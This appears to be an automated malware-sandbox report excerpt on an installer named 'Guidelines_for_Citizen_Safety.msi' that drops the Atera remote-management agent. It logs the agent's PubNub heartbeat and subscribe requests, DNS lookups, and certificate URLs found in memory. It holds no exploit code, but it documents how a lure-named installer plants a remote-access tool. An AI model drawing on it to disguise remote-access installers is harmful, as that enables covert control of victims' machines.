                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bdd8f068-e461-49d2-bf76-5496f217f86a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c2794a63-4cce-452a-a323-b26bf4d17cfd&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f3cbab58-b709-46f1-9320-2a47ceb98572&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=e037a3ed-5082-482a-83de-1fb0a079a164&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=326c90ae-c5b0-4a74-aa79-71ed3289b5e6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=1be45d8e-3b2c-4ea5-a5b7-07647d59b850&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=50d6fee0-b13e-4824-8baa-cb59cf186680&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Host: ps.pndsn.com
                              Source: global trafficHTTP traffic detected: GET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=a0a85a46-f9d7-4b43-9103-c66ecd6f79b0&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1Cache-Control: no-cachePragma: no-cacheContent-Type: application/jsonHost: ps.pndsn.com
                              Source: global trafficDNS traffic detected: DNS query: time.windows.com
                              Source: global trafficDNS traffic detected: DNS query: agent-api.atera.com
                              Source: global trafficDNS traffic detected: DNS query: ps.pndsn.com
                              Source: global trafficDNS traffic detected: DNS query: ps.atera.com
                              Source: AteraAgent.exe, 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe.2.drString found in binary or memory: http://acontrol.atera.com/
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC5082F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C45371F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC417F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC5082F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C45371F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC417F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                              Source: AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/=
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, C56C4404C4DEF0DC88E5FCD9F09CB2F10.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, AteraAgent.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: F2E248BEDDBB2D85122423C41028BFD40.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778616808.000002AC6900B000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BDF2000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2230821396.000002C46BD96000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393836236.0000020EDC907000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC8A6000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, C56C4404C4DEF0DC88E5FCD9F09CB2F1.15.dr, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                              Source: AgentPackageAgentInformation.exe, 00000019.00000002.2393367410.0000020EDC893000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crlc
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED49000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1537471670.00000158EEFEF000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2648055048.00000188B04EA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmp, 1A374813EDB1A6631387E414D3E732320.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B03DE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, AteraAgent.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: AteraAgent.exe, 0000000D.00000002.1537471670.00000158EEFEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlm
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B041A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, System.ValueTuple.dll.2.dr, 6c6863.msi.2.dr, Pubnub.dll.2.dr, ICSharpCode.SharpZipLib.dll.2.dr, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, AgentPackageAgentInformation.exe.15.dr, Newtonsoft.Json.dll.5.dr, Atera.AgentPackage.Common.dll.15.dr, Newtonsoft.Json.dll.15.dr, 6c6861.msi.2.dr, Newtonsoft.Json.dll.18.dr, AteraAgent.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED1F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED5F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmp, BA74182F76F15A9CF514DEF352303C950.15.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                              Source: AteraAgent.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: AteraAgent.exe, 0000000D.00000002.1537471670.00000158EEFE4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                              Source: AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlQo
                              Source: AteraAgent.exe, 0000000F.00000002.2643291786.00000188AFFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crleh
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, Guidelines_for_Citizen_Safety.msi, Microsoft.Deployment.WindowsInstaller.dll.4.dr, 6c6863.msi.2.dr, MSI8C79.tmp.2.dr, MSI8B30.tmp.2.dr, Microsoft.Deployment.WindowsInstaller.dll.6.dr, 6c6861.msi.2.dr, Microsoft.Deployment.WindowsInstaller.dll.18.dr, MSI8A93.tmp.2.dr, MSI8A82.tmp.2.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
